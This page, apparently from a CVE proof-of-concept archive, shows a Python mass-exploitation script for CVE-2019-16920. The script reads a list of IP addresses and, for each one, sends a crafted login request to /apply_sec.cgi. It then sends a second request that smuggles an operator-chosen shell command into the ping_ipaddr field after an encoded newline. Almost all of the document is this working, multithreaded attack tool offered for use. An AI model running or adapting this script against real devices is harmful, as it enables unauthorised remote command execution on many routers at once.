4837 Total CVEs
26 Years
GitHub
Home / 2019 / CVE-2019-16920
README.md
Rendering markdown...
POC / CVE-2019-16920-MassPwn3r.py PY
⬇ Raw GitHub ✕ Close 
from socket import *
import threading
import time
import sys

try:
	info = open(str(sys.argv[1]),'r').readlines()
	port = sys.argv[2]
	cmd = sys.argv[3]
except:
	print("[*]Usage Mass_CVE-2019-16920_Exploit.py ip_list port command")
	sys.exit()

class exploiter(threading.Thread):
	def __init__(self, ip):
		threading.Thread.__init__(self)
		self.ip = str(ip).rstrip('\n')
	def run(self):
		try:	# study requests to create your payloads
			host = self.ip
			auth = "POST /apply_sec.cgi HTTP/1.1\r\nHost: " + host + ":" + port + "\r\nUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:69.0) Gecko/20100101 Firefox/69.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: en-US,en;q=0.5\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 142\r\nConnection: close\r\nReferer: http://" + host + ":" + port + "/\r\nUpgrade-Insecure-Requests: 1\r\n\r\nhtml_response_page=login_pic.asp&login_name=YWRtaW4%3D&log_pass=&action=do_graph_auth&login_n=admin&tmp_log_pass=&graph_code=&session_id=62384"
			execution = "POST /apply_sec.cgi HTTP/1.1\r\nHost: " + host + ":" + port + "\r\nUser-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.14; rv:69.0) Gecko/20100101 Firefox/69.0\r\nAccept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8\r\nAccept-Language: vi-VN,vi;q=0.8,en-US;q=0.5,en;q=0.3\r\nAccept-Encoding: gzip, deflate\r\nContent-Type: application/x-www-form-urlencoded\r\nContent-Length: 131\r\nConnection: close\r\nReferer: http://" + host + ":" + port + "/login_pic.asp\r\nCookie: uid=1234123\r\nUpgrade-Insecure-Requests: 1\r\n\r\nhtml_response_page=login_pic.asp&action=ping_test&ping_ipaddr=127.0.0.1%0a" + cmd


			sock = socket(AF_INET, SOCK_STREAM)
			sock.settimeout(10)
			try:
				sock.connect((host, int(port)))
				print("[*]Exploiting: ", host)
			except:
				print("[!]Unable to connect to host")

			sock.sendall(auth.encode())
			sock.sendall(execution.encode())
			sock.close()
		except:
			pass

def main():
	for ip in info:
		try:
			time.sleep(0.01)
			exploiter(ip).start()
		except:
			pass

if __name__ == '__main__':
	main()